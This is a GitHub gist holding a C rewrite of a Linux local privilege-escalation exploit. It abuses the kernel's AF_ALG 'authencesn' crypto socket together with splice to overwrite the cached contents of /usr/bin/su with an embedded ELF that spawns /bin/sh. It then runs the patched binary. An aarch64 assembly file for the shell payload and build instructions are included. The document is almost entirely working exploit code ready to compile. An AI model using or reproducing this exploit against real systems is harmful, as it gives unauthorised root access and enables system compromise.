Last active
May 4, 2026 14:47
-
-
Save alufers/921cd6c4b606c5014d6cc61eefb080fe to your computer and use it in GitHub Desktop.
copy fail c rewrite
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile: zig cc -target aarch64-linux-musl -static exp.c -o main_aarch64 | |
| // Embedded binary is for aarch64, the commented out is the original x86_64 one. | |
| #define _GNU_SOURCE /* See feature_test_macros(7) */ | |
| #define _FILE_OFFSET_BITS 64 | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/socket.h> | |
| #include <linux/if_alg.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| #include <stdint.h> | |
| #include <fcntl.h> | |
| #include <memory.h> | |
| #include <fcntl.h> | |
| void c(int f, int t, const uint8_t payload[4]) { | |
| // socket(38, 5, 0) | |
| int a = socket(AF_ALG, SOCK_SEQPACKET, 0); | |
| // bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) | |
| struct sockaddr_alg sa = { | |
| .salg_family = AF_ALG, | |
| .salg_type = "aead", | |
| .salg_name = "authencesn(hmac(sha256),cbc(aes))", | |
| }; | |
| int retval = bind(a, (struct sockaddr *)&sa, sizeof(sa)); | |
| if (retval < 0) { | |
| perror("bind"); | |
| exit(1); | |
| } | |
| // setsockopt(279, 1, bytes.fromhex("0800010000000010" + "00" * 32)) | |
| uint8_t key[40] = {0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10}; | |
| setsockopt(a, SOL_ALG, ALG_SET_KEY, key, 40); | |
| // setsockopt(279, 5, None, 4) | |
| setsockopt(a, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4); | |
| // accept() | |
| int u = accept(a, NULL, NULL); | |
| int o = t + 4; | |
| // sendmsg([b"A"*4 + payload], [(279,3,b"\x00"*4), (279,2,b"\x10"+b"\x00"*19), (279,4,b"\x08"+b"\x00"*3)], 32768) | |
| uint8_t msg_data[8]; | |
| memset(msg_data, 'A', 4); | |
| memcpy(msg_data + 4, payload, 4); | |
| struct iovec iov = { .iov_base = msg_data, .iov_len = 8 }; | |
| uint8_t buf_op[4] = {0}; | |
| uint8_t buf_iv[20] = {0x10}; | |
| uint8_t buf_ad[4] = {0x08}; | |
| size_t cmsg_space = | |
| CMSG_SPACE(4) + | |
| CMSG_SPACE(20) + | |
| CMSG_SPACE(4); | |
| uint8_t *cmsg_buf = calloc(1, cmsg_space); | |
| struct msghdr msg = { | |
| .msg_iov = &iov, | |
| .msg_iovlen = 1, | |
| .msg_control = cmsg_buf, | |
| .msg_controllen = cmsg_space, | |
| }; | |
| struct cmsghdr *cm; | |
| cm = CMSG_FIRSTHDR(&msg); | |
| cm->cmsg_level = SOL_ALG; | |
| cm->cmsg_type = ALG_SET_OP; | |
| cm->cmsg_len = CMSG_LEN(4); | |
| memcpy(CMSG_DATA(cm), buf_op, 4); | |
| cm = CMSG_NXTHDR(&msg, cm); | |
| cm->cmsg_level = SOL_ALG; | |
| cm->cmsg_type = ALG_SET_IV; | |
| cm->cmsg_len = CMSG_LEN(20); | |
| memcpy(CMSG_DATA(cm), buf_iv, 20); | |
| cm = CMSG_NXTHDR(&msg, cm); | |
| cm->cmsg_level = SOL_ALG; | |
| cm->cmsg_type = 4; | |
| cm->cmsg_len = CMSG_LEN(4); | |
| memcpy(CMSG_DATA(cm), buf_ad, 4); | |
| sendmsg(u, &msg, MSG_MORE); | |
| free(cmsg_buf); | |
| // pipe() | |
| int pipefd[2]; | |
| pipe(pipefd); | |
| // splice(f, w, o, offset_src=0) — f has offset, w does not | |
| loff_t off_src = 0; | |
| splice(f, &off_src, pipefd[1], NULL, o, 0); | |
| // splice(r, u.fileno(), o) — no offsets on either side | |
| splice(pipefd[0], NULL, u, NULL, o, 0); | |
| // recv(8 + t), ignoring errors | |
| uint8_t rbuf[8 + 65536]; | |
| recv(u, rbuf, 8 + t, 0); | |
| } | |
| static unsigned char x[] = { | |
| /* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x9e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9e, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x31, 0xc0, 0x31, 0xff, 0xb0, 0x69, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x0f, | |
| 0x00, 0x00, 0x00, 0x31, 0xf6, 0x6a, 0x3b, 0x58, 0x99, 0x0f, 0x05, 0x31, | |
| 0xff, 0x6a, 0x3c, 0x58, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, | |
| 0x68, 0x00, 0x00, 0x00*/ | |
| 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0xb7, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x0c, 0x01, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x60, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x03, 0x00, 0x40, 0x00, | |
| 0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x2c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x2c, 0x01, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, | |
| 0x04, 0x00, 0x00, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0xe8, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0x00, 0x40, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, | |
| 0x03, 0x00, 0x00, 0x00, 0x47, 0x4e, 0x55, 0x00, 0x0b, 0x3f, 0x5f, 0x92, | |
| 0xe5, 0x8c, 0x1e, 0x44, 0xc8, 0x15, 0xa7, 0xe3, 0x97, 0x66, 0xf7, 0x70, | |
| 0x4c, 0x09, 0x19, 0xa0, 0xff, 0x43, 0x00, 0xd1, 0xe0, 0x00, 0x08, 0x10, | |
| 0xe0, 0x03, 0x00, 0xf9, 0xff, 0x07, 0x00, 0xf9, 0xe1, 0x03, 0x00, 0x91, | |
| 0xe2, 0x03, 0x1f, 0xaa, 0xa8, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, | |
| 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x00, 0x2e, 0x73, 0x68, | |
| 0x73, 0x74, 0x72, 0x74, 0x61, 0x62, 0x00, 0x2e, 0x6e, 0x6f, 0x74, 0x65, | |
| 0x2e, 0x67, 0x6e, 0x75, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x2d, 0x69, | |
| 0x64, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x2e, 0x64, 0x61, 0x74, | |
| 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, | |
| 0x07, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0xe8, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x1e, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x0c, 0x01, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x0c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x41, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x01, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 | |
| }; | |
| int main(int argc, char *argv[]) { | |
| const char *BIN_PATH = "/usr/bin/su"; | |
| if (argc > 1) { | |
| BIN_PATH = argv[1]; | |
| } | |
| int f = open(BIN_PATH, 0); | |
| if (f < 0) { | |
| perror("open"); | |
| return 1; | |
| } | |
| size_t i = 0; | |
| while (i < sizeof(x)) { | |
| c(f, i, x + i); | |
| i += 4; | |
| } | |
| system(BIN_PATH); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // shell.s - execve("/bin/sh", ["/bin/sh", NULL], NULL) for aarch64 | |
| // clang --target=aarch64-linux-gnu -nostdlib -static -Wl,--strip-all -o shell shell.s | |
| // then xxd -i ./shell and paste into the above code | |
| .section .data | |
| binsh: .asciz "/bin/sh" | |
| .section .text | |
| .global _start | |
| _start: | |
| // Reserve 16 bytes on stack (aligned), store argv array there | |
| sub sp, sp, #16 | |
| adr x0, binsh // x0 = &"/bin/sh" | |
| str x0, [sp] // argv[0] = &"/bin/sh" | |
| str xzr, [sp, #8] // argv[1] = NULL | |
| mov x1, sp // x1 = argv | |
| mov x2, xzr // x2 = envp = NULL | |
| mov x8, #221 // execve syscall | |
| svc #0 |
Author
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Oh nice, thanks. Will update the files.